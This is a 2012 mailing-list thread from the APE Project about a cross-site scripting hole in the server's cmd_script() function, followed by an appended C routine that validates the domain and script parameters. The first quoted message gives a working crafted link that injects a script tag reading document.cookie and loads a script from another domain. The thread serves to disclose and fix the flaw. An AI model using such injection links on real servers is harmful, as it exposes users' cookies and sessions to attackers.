This issue occurs in cmd_script() (src/cmd.c), so I believe it's transport-layer independent. There is a line:

sendf(callbacki->client->fd, callbacki->g_ape, "%s<html>\n<head>\n\t<script>\n\t\tdocument.domain=\"%s\"\n\t</script>\n", HEADER_DEFAULT, domain);

domain is not filtered; it is put in as is. The same situation is in the JFOREACH a few lines below, where the script URLs are pasted.
In my case I used pcre and a simple regexp to determine if domain and scripts are acceptable, and it works fine.

On Tuesday, 11 December 2012 14:43:18 UTC+1, RakonDark wrote:
>
> Is the issue for all transport layers?
>
> On 11 December 2012 14:25, Pablo Tejada <[email protected]> wrote:
>
>> Can a hook temporarily fix the security hole? For example:
>>
>> Ape.registerHook("script", function(){
>>     return false;
>> })
>>
>> On Dec 11, 2012 6:56 AM, "tr!ckle" <[email protected]> wrote:
>>
>>> I recently dealt with an issue that allows injecting any JS script by
>>> preparing a link like:
>>>
>>> http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+type%3D%5C%22text%2Fjavascript%22]}}]
>>>
>>> It allows you either to attach a script from your URL or to inject a script
>>> directly, as in this example.
>>>
>>> The solution for this issue is to filter both params, domain and scripts,
>>> in file src/cmd.c (function: cmd_script()) in the APE server.
>>> --
>>> You received this message because you are subscribed to the Google
>>> Groups "APE Project" group.
>>> To post to this group, send email to [email protected]
>>> To unsubscribe from this group, send email to
>>> [email protected]
>>> For more options, visit this group at
>>> http://groups.google.com/group/ape-project?hl=en
>>> ---
>>> APE Project (Ajax Push Engine)
>>> Official website : http://www.ape-project.org/
>>> Git Hub : http://github.com/APE-Project/
>>>
>
> --
> i cant trust, what i not know
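As an added example, not code from the APE project or from anyone on this thread, this is the kind of allow-list check for the domain and scripts parameters that the post above describes, written in C so it could sit in front of the output in cmd_script(). render_script_page() is a hypothetical stand-in for the sendf()/JFOREACH output (the HEADER_DEFAULT HTTP header is left out); the function names and the sample values in the comments are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hostname characters only (letters, digits, '-', '.'), non-empty labels <= 63 chars.
 * Quotes, '<', '>', whitespace and anything else are rejected outright. */
int domain_is_safe(const char *domain)
{
    size_t len = strlen(domain), label = 0;
    if (len == 0 || len > 253) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)domain[i];
        if (c == '.') {                       /* label boundary */
            if (label == 0 || i + 1 == len) return 0;   /* empty or trailing label */
            label = 0;
        } else if (isalnum(c) || (c == '-' && label > 0)) {
            if (++label > 63) return 0;
        } else return 0;
    }
    return label > 0;
}

/* Absolute http(s) URL built only from URL characters. It lands inside a
 * double-quoted src attribute, so '"', '<', '>', whitespace and control bytes
 * must never pass; percent-encoded forms are harmless in that context. */
int script_url_is_safe(const char *url)
{
    static const char allowed[] = "-._~:/?#[]@!$&()*+,;=%";
    if (strncmp(url, "http://", 7) != 0 && strncmp(url, "https://", 8) != 0) return 0;
    for (const char *p = url; *p; p++)
        if (!isalnum((unsigned char)*p) && strchr(allowed, *p) == NULL) return 0;
    return 1;
}

/* Hypothetical stand-in for the sendf()/JFOREACH output in cmd_script(): render
 * into a buffer only after every parameter passed validation. Returns bytes written or -1. */
int render_script_page(char *out, size_t outlen, const char *domain,
                       const char *const *scripts, size_t nscripts)
{
    if (!domain_is_safe(domain)) return -1;
    for (size_t i = 0; i < nscripts; i++)
        if (!script_url_is_safe(scripts[i])) return -1;
    int n = snprintf(out, outlen,
        "<html>\n<head>\n\t<script>\n\t\tdocument.domain=\"%s\"\n\t</script>\n", domain);
    if (n < 0 || (size_t)n >= outlen) return -1;
    for (size_t i = 0; i < nscripts; i++) {
        int m = snprintf(out + n, outlen - n, "\t<script src=\"%s\"></script>\n", scripts[i]);
        if (m < 0 || (size_t)m >= outlen - n) return -1;
        n += m;
    }
    return n;
}
```

A rejected request should be answered with an error rather than a partially rendered page, and a log line for the rejected value gives the operator something to alert on.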
